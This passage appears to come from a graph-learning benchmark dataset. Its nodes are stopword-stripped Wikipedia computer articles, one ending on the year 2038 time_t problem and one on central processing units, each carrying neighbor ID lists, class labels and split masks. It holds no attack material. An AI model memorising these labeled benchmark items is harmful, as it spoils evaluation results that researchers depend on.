year limits year maximum 2,147,485,547 2,147,483,647 1900 freebsd uses 64-bit codice_1 32-bit 64-bit architectures except 32-bit i386 uses unsigned 32-bit codice_1 instead starting netbsd version 6.0 released october 2012 netbsd operating system uses 64-bit codice_1 32-bit 64-bit architectures applications compiled older netbsd release 32-bit codice_1 supported via binary compatibility layer older applications still suffer year 2038 problem openbsd since version 5.5 released may 2014 also uses 64-bit codice_1 32-bit 64-bit architectures contrast netbsd binary compatibility layer therefore applications expecting 32-bit codice_1 applications using anything different codice_1 store time values may break linux uses 64-bit codice_1 64-bit architectures pure 32-bit abi changed due backward compatibility ongoing work mostly embedded linux systems support 64-bit codice_1 32-bit architectures x32 abi linux defines environment programs 32-bit addresses running processor 64-bit mode uses 64-bit codice_1 since new environment need special compatibility precautions network file system version 4 defined time fields codice_20 since december 2000 values greater zero seconds field denote dates 0-hour january 1 1970 values less zero seconds field denote dates 0-hour january 1 1970 cases nseconds nanoseconds field added seconds field final time representation alternative proposals made use storing either milliseconds microseconds since epoch typically either 1 january 1970 1 january 2000 signed 64-bit integer providing minimum range 300,000 years microsecond resolution proposals new time representations provide different precisions ranges sizes almost always wider 32 bits well solving related problems handling leap seconds particular tai64 implementation temps atomique international standard current international real-time standard defining second frame reference",
    "neighbors": [
      1922,
      8582,
      8966,
      6664,
      9236,
      7702,
      2199,
      4763,
      7071,
      5413,
      10413,
      5040,
      7734,
      823,
      1724,
      10176,
      9921,
      8260,
      4424,
      5065,
      3659,
      9557,
      2273,
      7139,
      2404,
      8037,
      10344,
      8298,
      7022,
      1263,
      2804,
      5492,
      246,
      8186,
      7421
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1776,
    "label": 3,
    "text": "Central_processing_unit:central processing unit central processing unit cpu also called central processor main processor electronic circuitry within computer carries instructions computer program performing basic arithmetic logic controlling input/output i/o operations specified instructions computer industry used term central processing unit least since early 1960s traditionally term cpu refers processor specifically processing unit control unit cu distinguishing core elements computer external components main memory i/o circuitry form design implementation cpus changed course history fundamental operation remains almost unchanged principal components cpu include arithmetic logic unit alu performs arithmetic logic operations processor registers supply operands alu store results alu operations control unit orchestrates fetching memory execution instructions directing coordinated operations alu registers components modern cpus microprocessors cpu contained single metal-oxide-semiconductor mos integrated circuit ic chip ic contains cpu may also contain memory peripheral interfaces components computer integrated devices variously called microcontrollers systems chip soc computers employ multi-core processor single chip containing two cpus called cores context one speak single chips sockets array processors vector processors multiple processors operate parallel unit considered central also exists concept virtual cpus abstraction dynamical aggregated computational resources early computers eniac physically rewired perform different tasks caused machines called fixed-program computers since term cpu generally defined device software computer program execution earliest devices could rightly called cpus came advent stored-program computer idea stored-program computer already present design j. presper eckert john william mauchly eniac initially omitted could finished sooner june 30 1945 eniac made mathematician john von neumann distributed paper entitled first draft report edvac outline stored-program computer would eventually completed august 1949 edvac designed perform certain number instructions operations various types significantly programs written edvac stored high-speed computer memory rather specified physical wiring computer overcame severe limitation eniac considerable time effort required reconfigure computer perform new task von neumann design program edvac ran could changed simply changing contents memory edvac however first stored-program computer manchester baby small-scale experimental stored-program computer ran first program 21 june 1948 manchester mark 1 ran first program night 16–17 june 1949 early cpus custom designs used part larger sometimes distinctive computer however method designing custom cpus particular application largely given way development multi-purpose processors produced large quantities standardization began era discrete transistor mainframes minicomputers rapidly accelerated popularization integrated circuit ic ic allowed increasingly complex cpus designed manufactured tolerances order nanometers miniaturization standardization cpus increased presence digital devices modern life far beyond limited application dedicated computing machines modern microprocessors appear electronic devices ranging automobiles cellphones sometimes even toys von neumann often credited design stored-program computer design edvac design became known von neumann architecture others konrad zuse suggested implemented similar ideas so-called harvard architecture harvard mark completed edvac also used stored-program design using punched paper tape rather electronic memory key difference von neumann harvard architectures latter separates storage treatment cpu instructions data former uses memory space modern cpus primarily von neumann design cpus harvard architecture seen well especially embedded applications instance atmel avr microcontrollers harvard architecture processors relays vacuum tubes thermionic tubes commonly used switching elements useful computer requires thousands tens thousands switching devices overall speed system dependent speed switches tube computers like edvac tended average eight hours failures whereas relay computers like slower earlier harvard mark failed rarely end tube-based cpus became dominant significant speed advantages afforded generally outweighed reliability problems early synchronous cpus ran low clock rates compared modern microelectronic designs clock signal frequencies ranging 100 khz 4 mhz common time limited largely speed switching devices built design complexity cpus increased various technologies facilitated building smaller reliable electronic devices first improvement came advent transistor transistorized cpus 1950s 1960s longer built bulky unreliable fragile switching elements like vacuum tubes relays improvement complex reliable cpus built onto one several printed circuit boards containing discrete individual components 1964 ibm introduced ibm system/360 computer architecture used series computers capable running programs different speed performance significant time electronic computers incompatible one another even made manufacturer facilitate improvement ibm used concept microprogram often called microcode still sees widespread usage modern cpus system/360 architecture popular dominated mainframe computer market decades left legacy still continued similar modern computers like ibm zseries 1965 digital equipment corporation dec introduced another influential computer aimed scientific research markets pdp-8 transistor-based computers several distinct advantages predecessors aside facilitating increased reliability lower power consumption transistors also allowed cpus operate much higher speeds short switching time transistor comparison tube relay increased reliability dramatically increased speed switching elements almost exclusively transistors time cpu clock rates tens megahertz easily obtained period additionally discrete transistor ic cpus heavy usage new high-performance designs like simd single instruction multiple data vector processors began appear early experimental designs later gave rise era specialized supercomputers like made cray inc fujitsu ltd. period method manufacturing many interconnected transistors compact space developed integrated circuit ic allowed large number transistors manufactured single semiconductor-based die chip first basic non-specialized digital circuits gates miniaturized ics cpus based building block ics generally referred small-scale integration ssi devices ssi ics ones used apollo guidance computer usually contained dozen transistors build entire cpu ssi ics required thousands individual chips still consumed much less space power earlier discrete transistor designs ibm system/370 follow-on system/360 used ssi ics rather solid logic technology discrete-transistor modules dec pdp-8/i ki10 pdp-10 also switched individual transistors used pdp-8 pdp-10 ssi ics extremely popular pdp-11 line originally built ssi ics eventually implemented lsi components became practical mosfet metal-oxide-semiconductor field-effect transistor also known mos transistor invented mohamed atalla dawon kahng bell labs 1959 demonstrated 1960 led development mos metal-oxide-semiconductor integrated circuit proposed kahng 1961 fabricated fred heiman steven hofstein rca 1962 high scalability much lower power consumption higher density bipolar junction transistors mosfet made possible build high-density integrated circuits lee boysel published influential articles including 1967 manifesto described build equivalent 32-bit mainframe computer relatively small number large-scale integration circuits lsi way build lsi chips chips hundred gates build using mos semiconductor manufacturing process either pmos logic nmos logic cmos logic however companies continued build processors bipolar transistor–transistor logic ttl chips bipolar junction transistors faster mos chips 1970s companies datapoint continued build processors ttl chips early 1980s 1960s mos ics slower initially considered useful applications required low power following development silicon-gate mos technology federico faggin fairchild semiconductor 1968 mos ics largely replaced bipolar ttl standard chip technology early 1970s microelectronic technology advanced increasing number transistors placed ics decreasing number individual ics needed complete cpu msi lsi ics increased transistor counts hundreds thousands 1968 number ics required build complete cpu reduced 24 ics eight different types ic containing roughly 1000 mosfets stark contrast ssi msi predecessors first lsi implementation pdp-11 contained cpu composed four lsi integrated circuits advances mos ic technology led invention microprocessor early 1970s since introduction first commercially available microprocessor intel 4004 1971 first widely used microprocessor intel 8080 1974 class cpus almost completely overtaken central processing unit implementation methods mainframe minicomputer manufacturers time launched proprietary ic development programs upgrade older computer architectures eventually produced instruction set compatible microprocessors backward-compatible older hardware software combined advent eventual success ubiquitous personal computer term cpu applied almost exclusively microprocessors several cpus denoted cores combined single processing chip previous generations cpus implemented discrete components numerous small integrated circuits ics one circuit boards microprocessors hand cpus manufactured small number ics usually one overall smaller cpu size result implemented single die means faster switching time physical factors like decreased gate parasitic capacitance allowed synchronous microprocessors clock rates ranging tens megahertz several gigahertz additionally ability construct exceedingly small transistors ic increased complexity number transistors single cpu many fold widely observed trend described moore law proven fairly accurate predictor growth cpu ic complexity 2016 complexity size construction general form cpus changed enormously since 1950 basic design function changed much almost common cpus today accurately described von neumann stored-program machines moore law longer holds concerns arisen limits integrated circuit transistor technology extreme miniaturization electronic gates causing effects phenomena like electromigration subthreshold leakage become much significant newer concerns among many factors causing researchers investigate new methods computing quantum computer well expand usage parallelism methods extend usefulness classical von neumann model fundamental operation cpus regardless physical form take execute sequence stored instructions called program instructions executed kept kind computer memory nearly cpus follow fetch decode execute steps operation collectively known instruction cycle execution instruction entire process repeats next instruction cycle normally fetching next-in-sequence instruction incremented value program counter jump instruction executed program counter modified contain address instruction jumped program execution continues normally complex cpus multiple instructions fetched decoded executed simultaneously section describes generally referred classic risc pipeline quite common among simple cpus used many electronic devices often called microcontroller largely ignores important role cpu cache therefore access stage pipeline instructions manipulate program counter rather producing result data directly instructions generally called jumps facilitate program behavior like loops conditional program execution use conditional jump existence functions processors instructions change state bits flags register flags used influence program behaves since often indicate outcome various operations example processors compare instruction evaluates two values sets clears bits flags register indicate one greater whether equal one flags could used later jump instruction determine program flow first step fetch involves retrieving instruction represented number sequence numbers program memory instruction location address program memory determined program counter pc stores number identifies address next instruction fetched instruction fetched pc incremented length instruction contain address next instruction sequence often instruction fetched must retrieved relatively slow memory causing cpu stall waiting instruction returned issue largely addressed modern processors caches pipeline architectures see instruction cpu fetches memory determines cpu decode step performed circuitry known instruction decoder instruction converted signals control parts cpu way instruction interpreted defined cpu instruction set architecture isa often one group bits field within instruction called opcode indicates operation performed remaining fields usually provide supplemental information required operation operands operands may specified constant value called immediate value location value may processor register memory address determined addressing mode cpu designs instruction decoder implemented hardwired unchangeable circuit others microprogram used translate instructions sets cpu configuration signals applied sequentially multiple clock pulses cases memory stores microprogram rewritable making possible change way cpu decodes instructions fetch decode steps execute step performed depending cpu architecture may consist single action sequence actions action various parts cpu electrically connected perform part desired operation action completed typically response clock pulse often results written internal cpu register quick access subsequent instructions cases results may written slower less expensive higher capacity main memory example addition instruction executed arithmetic logic unit alu inputs connected pair operand sources numbers summed alu configured perform addition operation sum operand inputs appear output alu output connected storage e.g. register memory receive sum clock pulse occurs sum transferred storage resulting sum large i.e. larger alu output word size arithmetic overflow flag set hardwired cpu circuitry set basic operations perform called instruction set operations may involve example adding subtracting two numbers comparing two numbers jumping different part program basic operation represented particular combination bits known machine language opcode executing instructions machine language program cpu decides operation perform decoding opcode complete machine language instruction consists opcode many cases additional bits specify arguments operation example numbers summed case addition operation going complexity scale machine language program collection machine language instructions cpu executes actual mathematical operation instruction performed combinational logic circuit within cpu processor known arithmetic logic unit alu general cpu executes instruction fetching memory using alu perform operation storing result memory beside instructions integer mathematics logic operations various machine instructions exist loading data memory storing back branching operations mathematical operations floating-point numbers performed cpu floating-point unit fpu control unit cu component cpu directs operation processor tells computer memory arithmetic logic unit input output devices respond instructions sent processor directs operation units providing timing control signals computer resources managed cu directs flow data cpu devices john von neumann included control unit part von neumann architecture modern computer designs control unit typically internal part cpu overall role operation unchanged since introduction arithmetic logic unit alu digital circuit within processor performs integer arithmetic bitwise logic operations inputs alu data words operated called operands status information previous operations code control unit indicating operation perform depending instruction executed operands may come internal cpu registers external memory may constants generated alu input signals settled propagated alu circuitry result performed operation appears alu outputs result consists data word may stored register memory status information typically stored special internal cpu register reserved purpose address generation unit agu sometimes also called address computation unit acu execution unit inside cpu calculates addresses used cpu access main memory address calculations handled separate circuitry operates parallel rest cpu number cpu cycles required executing various machine instructions reduced bringing performance improvements performing various operations cpus need calculate memory addresses required fetching data memory example in-memory positions array elements must calculated cpu fetch data actual memory locations address-generation calculations involve different integer arithmetic operations addition subtraction modulo operations bit shifts often calculating memory address involves one general-purpose machine instruction necessarily decode execute quickly incorporating agu cpu design together introducing specialized instructions use agu various address-generation calculations offloaded rest cpu often executed quickly single cpu cycle capabilities agu depend particular cpu architecture thus agus implement expose address-calculation operations also include advanced specialized instructions operate multiple operands time furthermore cpu architectures include multiple agus one address-calculation operation executed simultaneously bringing performance improvements capitalizing superscalar nature advanced cpu designs example intel incorporates multiple agus sandy bridge haswell microarchitectures increase bandwidth cpu memory subsystem allowing multiple memory-access instructions executed parallel high-end microprocessors desktop laptop server computers memory management unit translating logical addresses physical ram addresses providing memory protection paging abilities useful virtual memory simpler processors especially microcontrollers usually n't include mmu cpu cache hardware cache used central processing unit cpu computer reduce average cost time energy access data main memory cache smaller faster memory closer processor core stores copies data frequently used main memory locations cpus different independent caches including instruction data caches data cache usually organized hierarchy cache levels l1 l2 l3 l4 etc. modern fast cpus specialized exceptions multiple levels cpu caches first cpus used cache one level cache unlike later level 1 caches split l1d data l1i instructions almost current cpus caches split l1 cache also l2 caches larger processors l3 caches well l2 cache usually split acts common repository already split l1 cache every core multi-core processor dedicated l2 cache usually shared cores l3 cache higher-level caches shared cores split l4 cache currently uncommon generally dynamic random-access memory dram rather static random-access memory sram separate die chip also case historically l1 bigger chips allowed integration generally cache levels possible exception last level extra level cache tends bigger optimized differently types caches exist counted towards cache size important caches mentioned translation lookaside buffer tlb part memory management unit mmu cpus caches generally sized powers two 4 8 16 etc kib mib larger non-l1 sizes although ibm z13 96 kib l1 instruction cache cpus synchronous circuits means employ clock signal pace sequential operations clock signal produced external oscillator circuit generates consistent number pulses second form periodic square wave frequency clock pulses determines rate cpu executes instructions consequently faster clock instructions cpu execute second ensure proper operation cpu clock period longer maximum time needed signals propagate move cpu setting clock period value well worst-case propagation delay possible design entire cpu way moves data around edges rising falling clock signal advantage simplifying cpu significantly design perspective component-count perspective however also carries disadvantage entire cpu must wait slowest elements even though portions much faster limitation largely compensated various methods increasing cpu parallelism see however architectural improvements alone solve drawbacks globally synchronous cpus example clock signal subject delays electrical signal higher clock rates increasingly complex cpus make difficult keep clock signal phase synchronized throughout entire unit led many modern cpus require multiple identical clock signals provided avoid delaying single signal significantly enough cause cpu malfunction another major issue clock rates increase dramatically amount heat dissipated cpu constantly changing clock causes many components switch regardless whether used time general component switching uses energy element static state therefore clock rate increases energy consumption causing cpu require heat dissipation form cpu cooling solutions one method dealing switching unneeded components called clock gating involves turning clock signal unneeded components effectively disabling however often regarded difficult implement therefore see common usage outside low-power designs one notable recent cpu design uses extensive clock gating ibm powerpc-based xenon used xbox 360 way power requirements xbox 360 greatly reduced another method addressing problems global clock signal removal clock signal altogether removing global clock signal makes design process considerably complex many ways asynchronous clockless designs carry marked advantages power consumption heat dissipation comparison similar synchronous designs somewhat uncommon entire asynchronous cpus built without using global clock signal two notable examples arm compliant amulet mips r3000 compatible minimips rather totally removing clock signal cpu designs allow certain portions device asynchronous using asynchronous alus conjunction superscalar pipelining achieve arithmetic performance gains altogether clear whether totally asynchronous designs perform comparable better level synchronous counterparts evident least excel simpler math operations combined excellent power consumption heat dissipation properties makes suitable embedded computers every cpu represents numerical values specific way example early digital computers represented numbers familiar decimal base 10 numeral system values others employed unusual representations ternary base three nearly modern cpus represent numbers binary form digit represented two-valued physical quantity high low voltage related numeric representation size precision integer numbers cpu represent case binary cpu measured number bits significant digits binary encoded integer cpu process one operation commonly called word size bit width data path width integer precision integer size cpu integer size determines range integer values directly operate example 8-bit cpu directly manipulate integers represented eight bits range 256 2 discrete integer values integer range also affect number memory locations cpu directly address address integer value representing specific memory location example binary cpu uses 32 bits represent memory address directly address 2 memory locations circumvent limitation various reasons cpus use mechanisms bank switching allow additional memory addressed cpus larger word sizes require circuitry consequently physically larger cost consume power therefore generate heat result smaller 4- 8-bit microcontrollers commonly used modern applications even though cpus much larger word sizes 16 32 64 even 128-bit available higher performance required however benefits larger word size larger data ranges address spaces may outweigh disadvantages cpu internal data paths shorter word size reduce size cost example even though ibm system/360 instruction set 32-bit instruction set system/360 model 30 model 40 8-bit data paths arithmetic logical unit 32-bit add required four cycles one 8 bits operands even though motorola 68000 series instruction set 32-bit instruction set motorola 68000 motorola 68010 16-bit data paths arithmetic logical unit 32-bit add required two cycles gain advantages afforded lower higher bit lengths many instruction sets different bit widths integer floating-point data allowing cpus implementing instruction set different bit widths different portions device example ibm system/360 instruction set primarily 32 bit supported 64-bit floating point values facilitate greater accuracy range floating point numbers system/360 model 65 8-bit adder decimal fixed-point binary arithmetic 60-bit adder floating-point arithmetic many later cpu designs use similar mixed bit width especially processor meant general-purpose usage reasonable balance integer floating point capability required description basic operation cpu offered previous section describes simplest form cpu take type cpu usually referred subscalar operates executes one instruction one two pieces data time less one instruction per clock cycle process gives rise inherent inefficiency subscalar cpus since one instruction executed time entire cpu must wait instruction complete proceeding next instruction result subscalar cpu gets hung instructions take one clock cycle complete execution even adding second execution unit see improve performance much rather one pathway hung two pathways hung number unused transistors increased design wherein cpu execution resources operate one instruction time possibly reach scalar performance one instruction per clock cycle however performance nearly always subscalar less one instruction per clock cycle attempts achieve scalar better performance resulted variety design methodologies cause cpu behave less linearly parallel referring parallelism cpus two terms generally used classify design techniques methodology differs ways implemented well relative effectiveness afford increasing cpu performance application one simplest methods used accomplish increased parallelism begin first steps instruction fetching decoding prior instruction finishes executing simplest form technique known instruction pipelining used almost modern general-purpose cpus pipelining allows one instruction executed given time breaking execution pathway discrete stages separation compared assembly line instruction made complete stage exits execution pipeline retired pipelining however introduce possibility situation result previous operation needed complete next operation condition often termed data dependency conflict cope additional care must taken check sorts conditions delay portion instruction pipeline occurs naturally accomplishing requires additional circuitry pipelined processors complex subscalar ones though significantly pipelined processor become nearly scalar inhibited pipeline stalls instruction spending one clock cycle stage improvement upon idea instruction pipelining led development method decreases idle time cpu components even designs said superscalar include long instruction pipeline multiple identical execution units load-store units arithmetic-logic units floating-point units address generation units superscalar pipeline multiple instructions read passed dispatcher decides whether instructions executed parallel simultaneously dispatched available execution units resulting ability several instructions executed simultaneously general instructions superscalar cpu able dispatch simultaneously waiting execution units instructions completed given cycle difficulty design superscalar cpu architecture lies creating effective dispatcher dispatcher needs able quickly correctly determine whether instructions executed parallel well dispatch way keep many execution units busy possible requires instruction pipeline filled often possible gives rise need superscalar architectures significant amounts cpu cache also makes hazard-avoiding techniques like branch prediction speculative execution register renaming out-of-order execution transactional memory crucial maintaining high levels performance attempting predict branch path conditional instruction take cpu minimize number times entire pipeline must wait conditional instruction completed speculative execution often provides modest performance increases executing portions code may needed conditional operation completes out-of-order execution somewhat rearranges order instructions executed reduce delays due data dependencies also case single instruction stream multiple data stream—a case lot data type processed— modern processors disable parts pipeline single instruction executed many times cpu skips fetch decode phases thus greatly increases performance certain occasions especially highly monotonous program engines video creation software photo processing case portion cpu superscalar part part suffers performance penalty due scheduling stalls intel p5 pentium two superscalar alus could accept one instruction per clock cycle fpu could accept one instruction per clock cycle thus p5 integer superscalar floating point superscalar intel successor p5 architecture p6 added superscalar capabilities floating point features therefore afforded significant increase floating point instruction performance simple pipelining superscalar design increase cpu ilp allowing single processor complete execution instructions rates surpassing one instruction per clock cycle modern cpu designs least somewhat superscalar nearly general purpose cpus designed last decade superscalar later years emphasis designing high-ilp computers moved cpu hardware software interface isa strategy long instruction word vliw causes ilp become implied directly software reducing amount work cpu must perform boost ilp thereby reducing design complexity another strategy achieving performance execute multiple threads processes parallel area research known parallel computing flynn taxonomy strategy known multiple instruction stream multiple data stream mimd one technology used purpose multiprocessing mp initial flavor technology known symmetric multiprocessing smp small number cpus share coherent view memory system scheme cpu additional hardware maintain constantly up-to-date view memory avoiding stale views memory cpus cooperate program programs migrate one cpu another increase number cooperating cpus beyond handful schemes non-uniform memory access numa directory-based coherence protocols introduced 1990s smp systems limited small number cpus numa systems built thousands processors initially multiprocessing built using multiple discrete cpus boards implement interconnect processors processors interconnect implemented single chip technology known chip-level multiprocessing cmp single chip multi-core processor later recognized finer-grain parallelism existed single program single program might several threads functions could executed separately parallel earliest examples technology implemented input/output processing direct memory access separate thread computation thread general approach technology introduced 1970s systems designed run multiple computation threads parallel technology known multi-threading mt approach considered cost-effective multiprocessing small number components within cpu replicated support mt opposed entire cpu case mp mt execution units memory system including caches shared among multiple threads downside mt hardware support multithreading visible software mp thus supervisor software like operating systems undergo larger changes support mt one type mt implemented known temporal multithreading one thread executed stalled waiting data return external memory scheme cpu would quickly context switch another thread ready run switch often done one cpu clock cycle ultrasparc t1 another type mt simultaneous multithreading instructions multiple threads executed parallel within one cpu clock cycle several decades 1970s early 2000s focus designing high performance general purpose cpus largely achieving high ilp technologies pipelining caches superscalar execution out-of-order execution etc trend culminated large power-hungry cpus intel pentium 4 early 2000s cpu designers thwarted achieving higher performance ilp techniques due growing disparity cpu operating frequencies main memory operating frequencies well escalating cpu power dissipation owing esoteric ilp techniques cpu designers borrowed ideas commercial computing markets transaction processing aggregate performance multiple programs also known throughput computing important performance single thread process reversal emphasis evidenced proliferation dual core processor designs notably intel newer designs resembling less superscalar p6 architecture late designs several processor families exhibit cmp including x86-64 opteron athlon 64 x2 sparc ultrasparc t1 ibm power4 power5 well several video game console cpus like xbox 360 triple-core powerpc design playstation 3 7-core cell microprocessor less common increasingly important paradigm processors indeed computing general deals data parallelism processors discussed earlier referred type scalar device name implies vector processors deal multiple pieces data context one instruction contrasts scalar processors deal one piece data every instruction using flynn taxonomy two schemes dealing data generally referred single instruction stream multiple data stream simd single instruction stream single data stream sisd respectively great utility creating processors deal vectors data lies optimizing tasks tend require operation example sum dot product performed large set data classic examples types tasks include multimedia applications images video sound well many types scientific engineering tasks whereas scalar processor must complete entire process fetching decoding executing instruction value set data vector processor perform single operation comparatively large set data one instruction possible application tends require many steps apply one operation large set data early vector processors cray-1 associated almost exclusively scientific research cryptography applications however multimedia largely shifted digital media need form simd general-purpose processors become significant shortly inclusion floating-point units started become commonplace general-purpose processors specifications implementations simd execution units also began appear general-purpose processors early simd specifications like hp multimedia acceleration extensions max intel mmx integer-only proved significant impediment software developers since many applications benefit simd primarily deal floating-point numbers progressively developers refined remade early designs common modern simd specifications usually associated one isa notable modern examples include intel sse powerpc-related altivec also known vmx cloud computing involve subdividing cpu operation virtual central processing units vcpus host virtual equivalent physical machine virtual system operating several physical machines operating tandem managed whole grouped computing memory resources form cluster systems possible dynamically add remove cluster resources available host cluster level partitioned resources pools fine granularity performance speed processor depends among many factors clock rate generally given multiples hertz instructions per clock ipc together factors instructions per second ips cpu perform many reported ips values represented peak execution rates artificial instruction sequences branches whereas realistic workloads consist mix instructions applications take longer execute others performance memory hierarchy also greatly affects processor performance issue barely considered mips calculations problems various standardized tests often called benchmarks purposesuch specinthave developed attempt measure real effective performance commonly used applications processing performance computers increased using multi-core processors essentially plugging two individual processors called cores sense one integrated circuit ideally dual core processor would nearly twice powerful single core processor practice performance gain far smaller 50 due imperfect software algorithms implementation increasing number cores processor i.e dual-core quad-core etc increases workload handled means processor handle numerous asynchronous events interrupts etc take toll cpu overwhelmed cores thought different floors processing plant floor handling different task sometimes cores handle tasks cores adjacent single core enough handle information due specific capabilities modern cpus simultaneous multithreading uncore involve sharing actual cpu resources aiming increased utilization monitoring performance levels hardware use gradually became complex task response cpus implement additional hardware logic monitors actual use various parts cpu provides various counters accessible software example intel performance counter monitor technology",
    "neighbors": [
      4098,
      8196,
      6151,
      8199,
      2066,
      4114,
      6165,
      2073,
      4124,
      8222,
      6178,
      36,
      4132,
      38,
      6181,
      40,
      6183,
      8231,
      4139,
      6187,
      8233,
      10284,
      10285,
      10287,
      2097,
      4147,
      6197,
      4152,
      8250,
      8253,
      2111,
      2113,
      10310,
      2121,
      4172,
      4173,
      10316,
      4180,
      4185,
      6233,
      4194,
      10338,
      10340,
      8296,
      2159,
      10351,
      6258,
      4211,
      10357,
      4216,
      10361,
      6266,
      8315,
      4220,
      4221,
      6268,
      10365,
      4225,
      8322,
      8327,
      4235,
      6283,
      4237,
      147,
      4244,
      6294,
      4248,
      6296,
      10392,
      10393,
      4252,
      8352,
      4257,
      4258,
      2213,
      6310,
      6311,
      10405,
      10410,
      2221,
      4270,
      2224,
      2226,
      4280,
      4283,
      2237,
      4285,
      4286,
      2241,
      194,
      2243,
      4291,
      199,
      10440,
      2258,
      2259,
      217,
      8409,
      219,
      2269,
      10462,
      2273,
      2277,
      6378,
      2285,
      4334,
      4337,
      242,
      6387,
      8433,
      10483,
      6390,
      6391,
      8438,
      249,
      8439,
      10485,
      2303,
      8450,
      2308,
      10500,
      8456,
      4361,
      2314,
      10508,
      6415,
      2327,
      8472,
      282,
      8474,
      6431,
      8480,
      4385,
      4386,
      291,
      2339,
      4389,
      8481,
      8484,
      10234,
      2345,
      10537,
      2349,
      4399,
      8496,
      10543,
      10544,
      6452,
      309,
      8501,
      8508,
      6464,
      8514,
      10562,
      4423,
      8521,
      6474,
      8523,
      6476,
      8525,
      2383,
      6479,
      10576,
      2386,
      2388,
      6485,
      342,
      8534,
      344,
      2394,
      4444,
      8540,
      2399,
      6495,
      4449,
      8543,
      8544,
      6501,
      6502,
      8551,
      8552,
      6505,
      10601,
      10603,
      10608,
      4465,
      372,
      2420,
      10612,
      6523,
      10620,
      6539,
      398,
      2449,
      6547,
      10644,
      405,
      407,
      409,
      4508,
      2462,
      2463,
      10658,
      4518,
      10664,
      2476,
      4524,
      10669,
      2480,
      10675,
      8629,
      440,
      8633,
      2490,
      2492,
      446,
      10691,
      10692,
      453,
      2502,
      2503,
      456,
      4553,
      6601,
      10703,
      464,
      6608,
      466,
      8662,
      473,
      8665,
      2523,
      477,
      2525,
      2529,
      2535,
      2540,
      10732,
      10734,
      6639,
      499,
      2547,
      4596,
      2551,
      2553,
      8698,
      10746,
      508,
      8700,
      10749,
      6659,
      10757,
      518,
      4622,
      10767,
      529,
      10770,
      2586,
      10779,
      8732,
      10781,
      10784,
      10786,
      10788,
      6705,
      10802,
      563,
      4664,
      8761,
      4666,
      2620,
      2623,
      8767,
      10820,
      8773,
      4679,
      4682,
      2635,
      2638,
      8783,
      594,
      2642,
      4690,
      8786,
      10835,
      4695,
      10837,
      10838,
      602,
      8794,
      6748,
      10840,
      8806,
      4716,
      8812,
      10862,
      8815,
      2674,
      6772,
      630,
      8822,
      10878,
      6783,
      641,
      4739,
      10884,
      4741,
      4742,
      6790,
      8842,
      6799,
      10895,
      2707,
      2708,
      6804,
      8851,
      6807,
      664,
      4764,
      669,
      6815,
      8863,
      6818,
      6821,
      6824,
      682,
      2731,
      2735,
      8879,
      8880,
      8882,
      6837,
      694,
      2745,
      8890,
      4796,
      8893,
      8896,
      8898,
      4803,
      2759,
      4807,
      4810,
      8917,
      6870,
      8919,
      10966,
      10969,
      731,
      6877,
      6878,
      10974,
      4832,
      4833,
      6884,
      8937,
      10985,
      8942,
      6896,
      8944,
      6900,
      757,
      2805,
      4856,
      8952,
      2811,
      11008,
      11017,
      780,
      781,
      2829,
      4879,
      784,
      4880,
      6924,
      6926,
      8982,
      2839,
      4890,
      6949,
      6950,
      2856,
      11050,
      6956,
      6957,
      4910,
      815,
      9006,
      11054,
      11060,
      821,
      823,
      11066,
      9022,
      4928,
      6978,
      6979,
      9042,
      6996,
      2901,
      854,
      9044,
      11093,
      7002,
      11103,
      9057,
      11118,
      2937,
      7033,
      9084,
      2941,
      894,
      7041,
      9090,
      9091,
      2948,
      9093,
      9095,
      2956,
      913,
      9110,
      7063,
      921,
      5019,
      9115,
      7071,
      2979,
      9126,
      936,
      938,
      7086,
      2993,
      9137,
      11200,
      7105,
      3010,
      11203,
      3014,
      7110,
      7111,
      7112,
      9159,
      973,
      5073,
      3027,
      9173,
      5078,
      9174,
      5080,
      3037,
      7134,
      3039,
      9182,
      5090,
      995,
      7142,
      1005,
      3053,
      7151,
      11248,
      3070,
      3075,
      1029,
      7173,
      11270,
      9224,
      3081,
      9233,
      11282,
      3091,
      7188,
      9235,
      11289,
      11293,
      1057,
      1060,
      9255,
      7211,
      5165,
      7213,
      7218,
      5175,
      3130,
      1083,
      1087,
      1088,
      3137,
      1090,
      7234,
      7235,
      11331,
      3142,
      11337,
      7243,
      9292,
      7247,
      7248,
      3157,
      9302,
      9309,
      3166,
      9312,
      1122,
      7269,
      7270,
      3175,
      11373,
      1137,
      5233,
      7281,
      1140,
      7282,
      7283,
      7284,
      7286,
      11380,
      3194,
      3197,
      5247,
      3203,
      11395,
      3205,
      7302,
      11396,
      7309,
      9359,
      1168,
      7313,
      1170,
      5266,
      9366,
      5274,
      7323,
      9371,
      1194,
      5290,
      9391,
      1202,
      11447,
      3256,
      1211,
      11452,
      9408,
      5318,
      9422,
      3281,
      3282,
      5329,
      7377,
      1237,
      5339,
      5340,
      3293,
      1247,
      11487,
      9443,
      3300,
      7399,
      3307,
      1260,
      5356,
      5358,
      11499,
      5363,
      3317,
      3319,
      5368,
      3321,
      9466,
      3323,
      5373,
      1278,
      5375,
      7421,
      11522,
      5380,
      11524,
      7432,
      1290,
      3338,
      9489,
      1298,
      11539,
      7445,
      1304,
      3352,
      5400,
      9498,
      11545,
      1309,
      9501,
      11549,
      5412,
      11557,
      9512,
      9516,
      11580,
      1346,
      1348,
      7495,
      9547,
      11596,
      7501,
      3406,
      5457,
      7505,
      11604,
      9563,
      11613,
      1376,
      1377,
      5475,
      3431,
      9581,
      11629,
      11630,
      7536,
      7538,
      11636,
      3445,
      1399,
      1402,
      1403,
      9598,
      5503,
      3457,
      11649,
      9605,
      11655,
      7561,
      11657,
      3467,
      3470,
      5518,
      1424,
      1425,
      3472,
      5523,
      1428,
      3483,
      7579,
      9628,
      7589,
      7591,
      11690,
      7601,
      1461,
      1463,
      3511,
      7607,
      9655,
      7614,
      7617,
      1480,
      1482,
      7635,
      3547,
      1499,
      1502,
      1503,
      7651,
      7653,
      7657,
      1515,
      9707,
      5616,
      5617,
      9714,
      3575,
      3577,
      1533,
      1534,
      5629,
      1537,
      3585,
      3586,
      9732,
      7687,
      5640,
      5642,
      9739,
      9741,
      7697,
      3603,
      7699,
      3605,
      5655,
      5658,
      1563,
      5659,
      3613,
      7709,
      7717,
      1578,
      3630,
      9774,
      5684,
      7734,
      7739,
      5692,
      9791,
      7745,
      7747,
      7748,
      1614,
      1615,
      3662,
      5711,
      1621,
      5717,
      1624,
      7769,
      7770,
      9820,
      3677,
      3679,
      1632,
      1633,
      9826,
      5736,
      5739,
      5744,
      1651,
      5753,
      7801,
      9851,
      7806,
      1664,
      9857,
      9859,
      9861,
      3722,
      1677,
      7824,
      1683,
      7830,
      7833,
      9887,
